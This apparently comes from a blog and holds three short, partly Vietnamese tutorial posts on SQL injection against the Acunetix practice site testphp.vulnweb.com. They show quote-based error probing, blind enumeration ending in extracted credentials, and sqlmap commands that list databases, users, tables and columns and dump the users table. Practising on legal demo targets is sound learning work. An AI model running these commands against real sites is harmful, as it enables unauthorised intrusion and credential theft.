• Security

    Blind SQL Injection at Testphp.vulnweb.com

    Blind SQL Injection

    Check error: http://testphp.vulnweb.com/artists.php?artist=1′

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62

    1. Select Table Name and Column Name

    Result: artists | artist_id

    2. Select other Table (Skipping Artists table)

    Result: carts | cart_id

    Skipping table ‘artists’,’carts’, ‘categ’, ‘featured’, ‘guestbook’, ‘pictures’, ‘products’

    Result: users | uname

    3. Display other column in table “users”

    Result: users | pass

    There are 2 columns in the table “users” as below:
    “users | uname”
    “users | pass”

    4. Show uname & pass value from table “users”

    Final result: test | test

    User: test | Password: test

    artists - Mozilla Firefox 2016-12-04 17.05.16

     

  • Security

    Thu thập thông tin Database bằng sqlmap

    Fingerprinting the system and database
    Site: http://testphp.vulnweb.com
    ——

    Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query

    Get database & DB version.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b

    Get user & role.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles

    Get current user, current database and hostname information.

    [email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname

  • Security

    Basic SQL Injection with sqlmap

    SQL Injection with sqlmap
    Site: http://testphp.acunetix.com/

    =======================
    1. Check the URL.

    Chèn thử dấu ‘ phía sau địa chỉ để kiểm tra lỗi: http://testphp.acunetix.com/search.php?test=query’

    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

    Có lỗi rồi. Mình sẽ dùng sqlmap để kiểm tra.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dbs
    => Lệnh này mình dùng để kiểm tra xem trang web dùng Database tên gì (get database name)

    Cái “information_schema” là DB mặc định của MySQL. Đừng quan tâm đến nó.
    Cái “acuart” là tên của DB trang web, cái chúng ta cần.

    2. Sau khi có tên DB, chúng ta sẽ get Table.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –tables D acuart

    sqlmap lấy thông tin khá nhanh.

    3. Get Columns.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –columns D acuart

    4. Dump Data.

    Có khá nhiều bảng, mình sẽ lấy dữ liệu của bảng tên là “users”. Trong bảng này thường có nhiều thông tin cần thiết cho việc tấn công.

    [email protected]:~# sqlmap -u “http://testphp.acunetix.com/search.php?test=query” –dump -D acuart -T users

    Đến đây chúng ta đã có được thông tin cần thiết.